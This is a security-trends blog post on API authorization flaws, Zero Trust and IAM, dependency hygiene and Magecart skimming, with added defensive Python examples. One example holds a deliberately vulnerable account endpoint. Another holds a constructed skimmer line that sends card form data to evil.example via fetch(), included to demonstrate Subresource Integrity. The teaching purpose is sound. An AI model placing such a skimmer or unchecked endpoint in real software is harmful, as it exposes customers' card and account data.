Steven Puddephatt, Senior Cloud Architect @ GlobalDots
13.02.2020
4 Min read

As we move into a new decade IT professionals will be scratching their heads wondering “what new threat is going to cause me to have to rethink my security architecture or user policy?”. As a solutions architect working with a wide range of customers, here’s my take on what’s coming.

API security to take centre stage

Up until now very little has been done around API security once you get past basic authentication. What do I mean by this? Well, to make an API 'get' some data you send it a request; let's say in our case it's a mobile banking app that shows your name and address as well as your account number. To get information from the API, the mobile banking app has to authenticate to it, typically over TLS with a token or API key that an attacker is not going to forge. Great, the connection is trusted and secure. But attackers have shown time and again that once you have authenticated access to an API you can often coax it into returning data that wasn't intended for you, because the API checks who you are but not whether you are allowed to see the particular object you asked for.

In my example, imagine if swapping out the account number in my API call gave me the addresses and account numbers of other bank customers. Sound far-fetched? Not really: this class of flaw (broken object-level authorization, often called IDOR) is behind many of the API breaches in the news, and even Facebook and Google have been victims. You have to ask yourself 'if Google and Facebook have problems, what are the odds that I do not?'.

And so we'll see the adoption of machine learning tools for APIs which, rather than relying on authentication alone for security, model normal client behaviour and flag deviations from it, such as one token walking through thousands of account numbers. Practically everything has an API these days, and they were built with ease and portability in mind; security was something of an afterthought, an attitude which will change dramatically in the coming year.
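Here is what the account-number swap, the authorization check that stops it, and the behavioural check described above look like in code. This is an added example, not code from the original article; the account store, session tokens and request log are constructed for illustration, and the handlers stand in for a real HTTP framework.

```python
"""Broken object-level authorization in a banking-style API, and a
behavioural check for it.

Added example, not code from the original article. The account store,
session tokens and request log are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed data: account number -> owner and the details the app displays.
ACCOUNTS = {
    "10000001": {"owner": "alice", "name": "Alice Smith", "address": "1 High St"},
    "10000002": {"owner": "bob",   "name": "Bob Jones",   "address": "2 Low Rd"},
}

# Constructed session store: bearer token -> authenticated user.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}


@dataclass
class Response:
    status: int
    body: Optional[dict] = None


def authenticate(token: str) -> Optional[str]:
    """Maps a bearer token to a user id, or None if the token is unknown."""
    return SESSIONS.get(token)


def public_view(record: dict) -> dict:
    """Strips the internal owner field before the record leaves the API."""
    return {k: v for k, v in record.items() if k != "owner"}


def get_account_vulnerable(token: str, account_no: str) -> Response:
    """GET /accounts/<account_no>: authenticates the caller but never asks
    whether the caller owns the account.  Any logged-in user can change the
    account number in the request and read other customers' data."""
    user = authenticate(token)
    if user is None:
        return Response(401)
    record = ACCOUNTS.get(account_no)
    if record is None:
        return Response(404)
    return Response(200, public_view(record))


def get_account_hardened(token: str, account_no: str) -> Response:
    """Same endpoint with an object-level authorization check on every
    request.  A foreign account answers 404 rather than 403 so the response
    does not confirm which account numbers exist."""
    user = authenticate(token)
    if user is None:
        return Response(401)
    record = ACCOUNTS.get(account_no)
    if record is None or record["owner"] != user:
        return Response(404)
    return Response(200, public_view(record))


def flag_enumeration(request_log, threshold: int = 5):
    """Behavioural check of the kind the article expects tooling to do:
    a token that touches more than `threshold` distinct account numbers is
    flagged even though every one of its requests was authenticated.
    request_log is a list of (token, account_no) pairs."""
    seen = {}
    for token, account_no in request_log:
        seen.setdefault(token, set()).add(account_no)
    return sorted(t for t, accounts in seen.items() if len(accounts) > threshold)


if __name__ == "__main__":
    print(get_account_vulnerable("tok-alice", "10000002"))  # Bob's data leaks
    print(get_account_hardened("tok-alice", "10000002"))    # status 404, no body
    # Constructed log: Alice's token walking through consecutive account numbers.
    log = [("tok-alice", str(10000001 + i)) for i in range(8)] + [("tok-bob", "10000002")]
    print(flag_enumeration(log))                            # ['tok-alice']
```

The hardened handler keeps authentication exactly as it was; the only change is that ownership is checked on every object access, which is the check the article says is usually missing. The enumeration counter is deliberately simple, but note that it catches the attack from the server's own request log without any knowledge of which individual request was "wrong".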

Zero Trust and Identity and Access Management (IAM)

Zero trust is the latest buzzword to have hit nearly all the meetings I sit in. Unfortunately for IT managers and sysadmins it isn't just a buzzword; it's a new paradigm for managing access to resources, which means you'll have to rethink your approach to remote access and logins. There are different approaches to Zero Trust, but for the uninitiated it means the end of the old VPN model, where connecting to the network implicitly grants access to everything on it, and a move to per-application access through identity-aware portals, typically reached from a web browser, where every request is authenticated and authorized on its own.

Tightly coupled with Zero Trust is IAM, which pushes organisations to have 'one source of truth' for what access a user should have. IAM is necessary because we've shifted almost entirely to SaaS platforms, most of which are accessed with nothing more than an email address and password.

How many people reading this article access Salesforce with user/password authentication alone? And how many people have left a company only to find out their old user/password still works? The problem is widespread and companies are way behind in their uptake of Zero Trust and IAM. Rest assured you'll see more stories of VPN connections being hacked, and businesses will be forced to move to new technologies.
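The 'one source of truth' point becomes concrete when you reconcile each SaaS platform's user list against it. The script below, an added example rather than code from the original article, takes a constructed HR roster and two constructed SaaS user exports and reports orphaned accounts, leavers whose logins still work, and password-only accounts; in practice the exports would come from each platform's admin API or SCIM endpoint, which is assumed here.

```python
"""Reconciling SaaS user lists against the identity source of truth.

Added example, not code from the original article. The HR roster and the
SaaS user exports are constructed inline; a real run would pull them from
the HR system / IdP and each SaaS platform's admin or SCIM API.
"""
from datetime import date

# Constructed source of truth: who should have access, and who has left.
HR_ROSTER = {
    "alice@example.com": {"status": "active",     "left": None},
    "bob@example.com":   {"status": "terminated", "left": date(2019, 11, 30)},
    "carol@example.com": {"status": "active",     "left": None},
}

# Constructed exports from two SaaS platforms.  Note the mixed-case email in
# the wiki export: real exports differ in such details and must be normalised.
SAAS_USERS = {
    "crm": [
        {"email": "alice@example.com", "last_login": date(2020, 2, 10), "mfa": True},
        {"email": "bob@example.com",   "last_login": date(2020, 1, 15), "mfa": False},
        {"email": "dave@example.com",  "last_login": date(2020, 2, 1),  "mfa": False},
    ],
    "wiki": [
        {"email": "Alice@Example.com", "last_login": date(2020, 2, 12), "mfa": True},
        {"email": "carol@example.com", "last_login": None,              "mfa": False},
    ],
}


def reconcile(roster, saas_users):
    """Returns sorted (app, email, finding) triples for every account that the
    source of truth says should not exist, should be disabled, or is
    protected by a password alone."""
    findings = []
    for app, users in saas_users.items():
        for u in users:
            email = u["email"].lower()
            person = roster.get(email)
            if person is None:
                # Nobody in HR owns this login: a contractor, a test account,
                # or a typo that was never cleaned up.
                findings.append((app, email, "orphan: not in source of truth"))
                continue
            if person["status"] != "active":
                msg = "leaver still enabled"
                if u["last_login"] and u["last_login"] > person["left"]:
                    days = (u["last_login"] - person["left"]).days
                    msg += f", logged in {days} days after leaving"
                findings.append((app, email, msg))
            if not u["mfa"]:
                findings.append((app, email, "password-only login (no MFA)"))
    return sorted(findings)


if __name__ == "__main__":
    for app, email, finding in reconcile(HR_ROSTER, SAAS_USERS):
        print(f"{app:5} {email:20} {finding}")
```

Run on the constructed data this reports four findings: Bob's CRM login is still enabled and was used 46 days after his leaving date, Bob and Carol log in with a password only, and Dave exists in the CRM but not in HR at all. The same loop is what an IAM or SCIM-based deprovisioning flow automates; the point of the example is that without a single roster to compare against, none of these questions can even be asked.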

Software hygiene and third party scripts

So we've all heard the scenario: you need to write a program for something-or-other. After a quick search around it turns out that there are three pieces of open source software available which, when used together, will perform the function you require. Great, so you've just saved tonnes of development effort and your time to market is greatly reduced.

The only problem with this is that you've now got three pieces of open source code running, each of which can punch a hole in your security posture. Let's say, for example, that one of them pulls in an open source SSL/TLS library, and later a vulnerability is found in that library. How would you know you were affected if the library was just compiled into your program? How clean is your program and its component parts?

This software hygiene is now becoming a major headache for companies, especially when you're looking at hundreds of libraries with possibly thousands of known vulnerabilities between them. Help is at hand: some tech startups are already offering automated tools (software composition analysis) that inventory your dependencies, transitive ones included, and alert you to any CVEs your software might contain.
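At its core such a tool is an inventory of pinned versions matched against advisory ranges. The block below is an added example, not code from the original article or any product: the manifest and the advisory list are constructed for illustration, the advisory IDs are placeholders rather than real CVE numbers, and a real tool would pull advisories from a feed such as the NVD or OSV and read a lock file or SBOM rather than a hand-written list.

```python
"""Checking a pinned dependency manifest against vulnerability advisories.

Added example, not code from the original article. The manifest and the
advisory list are constructed for illustration and the advisory IDs are
placeholders, not real CVE numbers.  A real tool pulls advisories from a
feed (NVD, OSV, a vendor database) and walks transitive dependencies from
a lock file or SBOM.
"""
from typing import Dict, List, Tuple

# Constructed manifest in requirements.txt style.  urllib3 stands for the
# library nobody remembers depending on because it arrived transitively.
MANIFEST = """\
# application dependencies
requests==2.22.0
pyyaml==5.1
urllib3==1.24.1
"""

# Constructed advisories: (placeholder id, package, first affected, first fixed).
ADVISORIES = [
    ("EXAMPLE-ADV-0001", "pyyaml",   "0.0.0", "5.2"),
    ("EXAMPLE-ADV-0002", "urllib3",  "1.0.0", "1.24.2"),
    ("EXAMPLE-ADV-0003", "requests", "2.3.0", "2.20.0"),
]


def parse_version(v: str) -> Tuple[int, int, int]:
    """Turns '5.1' into (5, 1, 0) so that '5.1' and '5.1.0' compare equal
    instead of the shorter tuple sorting first."""
    parts = [int(p) for p in v.split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def parse_manifest(text: str) -> Dict[str, str]:
    """Reads 'name==version' lines.  Anything not pinned with == is rejected:
    an unpinned manifest cannot be assessed, which is itself a hygiene finding."""
    deps = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "==" not in line:
            raise ValueError(f"unpinned dependency: {line}")
        name, version = line.split("==", 1)
        deps[name.strip().lower()] = version.strip()
    return deps


def find_vulnerable(deps: Dict[str, str], advisories) -> List[Tuple[str, str, str, str]]:
    """Returns (package, installed, advisory id, fixed-in) for every installed
    version inside an advisory's affected range [introduced, fixed)."""
    hits = []
    for adv_id, pkg, introduced, fixed in advisories:
        installed = deps.get(pkg)
        if installed is None:
            continue
        v = parse_version(installed)
        if parse_version(introduced) <= v < parse_version(fixed):
            hits.append((pkg, installed, adv_id, fixed))
    return sorted(hits)


if __name__ == "__main__":
    for pkg, installed, adv_id, fixed in find_vulnerable(parse_manifest(MANIFEST), ADVISORIES):
        print(f"{pkg} {installed}: {adv_id}, upgrade to {fixed}")
```

On the constructed input this flags pyyaml and urllib3 and correctly leaves requests alone because the installed version is past the fix. Two details matter in practice and are handled above: version strings with different numbers of components must compare equal when they denote the same release, and an unpinned manifest is refused rather than silently skipped, because you cannot answer "am I affected?" for a version you do not know.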

On the other side of your application you've got third party plugins: things which you intentionally allow to access certain parts of your app to provide a feature on your website. This is currently the wild west of the IT world, with companies allowing third party JavaScript on their site with a very laissez-faire attitude as to what it's really doing. Attacks leveraging this part of the attack surface roughly come under the name 'Magecart', the highest profile incident last year being credit card data theft from British Airways. It's been coming for a while, but expect to see a big lock down on allowing random open source code and third party add-ons on sites.

Again, there are certain startups addressing the issue, but I'm fairly sure we'll see some high profile 'Magecart' attacks in 2020 before everyone really takes note. These types of attacks became newsworthy in the last few years and we can be sure that, moving forward, they will get much worse; perhaps even bigger attacks and huge fines levied. These weaknesses in the software deployment lifecycle will need careful attention.
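The two browser-side controls that lock this down are Subresource Integrity, which pins a third-party script to the exact bytes you reviewed, and a Content Security Policy, which limits where scripts may load from and where the page may send data. The block below is an added example, not code from the original article: the script bodies, host names and report endpoint are constructed, and it shows both how the integrity value is produced for the tag and why a skimmer line appended to the vendor's copy makes the browser refuse to run it.

```python
"""Pinning third-party scripts with Subresource Integrity (SRI) and a
Content Security Policy.

Added example, not code from the original article. The script bodies,
host names and report endpoint are constructed for illustration.
"""
import base64
import hashlib
import hmac

# Constructed: the script a vendor shipped when the site was reviewed, and a
# later copy where a skimmer line has been appended on the vendor's CDN.
ORIGINAL_SCRIPT = b"window.checkoutWidget = function () { /* legitimate widget */ };\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + (
    b"fetch('https://evil.example/c?d=' + document.forms[0].card.value);\n"
)


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Returns the integrity value browsers expect: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(body: bytes, integrity: str) -> bool:
    """What the browser does before executing a fetched script: recompute the
    digest and refuse to run the script if it does not match."""
    algo, _, _ = integrity.partition("-")
    try:
        return hmac.compare_digest(sri_hash(body, algo), integrity)
    except ValueError:  # unknown digest algorithm
        return False


def script_tag(src: str, body: bytes) -> str:
    """Emits the tag to put in the page; crossorigin is required for SRI to
    apply to a cross-origin script."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def csp_header(script_hosts, connect_hosts, report_path="/csp-report") -> str:
    """Builds a Content-Security-Policy that allow-lists where script may load
    from and where the page may send data.  A skimmer that does get in and
    tries to post card data to an unlisted host is blocked by connect-src and
    form-action, and the violation is reported to report_path."""
    return "; ".join([
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self' " + " ".join(connect_hosts),
        "form-action 'self'",
        "report-uri " + report_path,
    ])


if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.vendor.example/widget.js", ORIGINAL_SCRIPT))
    print(verify_integrity(ORIGINAL_SCRIPT, pinned))   # True
    print(verify_integrity(TAMPERED_SCRIPT, pinned))   # False: browser refuses to run it
    print(csp_header(["https://cdn.vendor.example"], ["https://api.example.com"]))
```

One caveat a practitioner should keep in mind: SRI only protects a script you load yourself with a fixed URL. A vendor script that in turn loads further scripts, or one that changes with every release, cannot be pinned, and that is exactly where the CSP allow-list and its violation reports do the work, by stopping the exfiltration request even when the injected code runs.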

*This post originally appeared in SC Magazine UK on February 6, 2020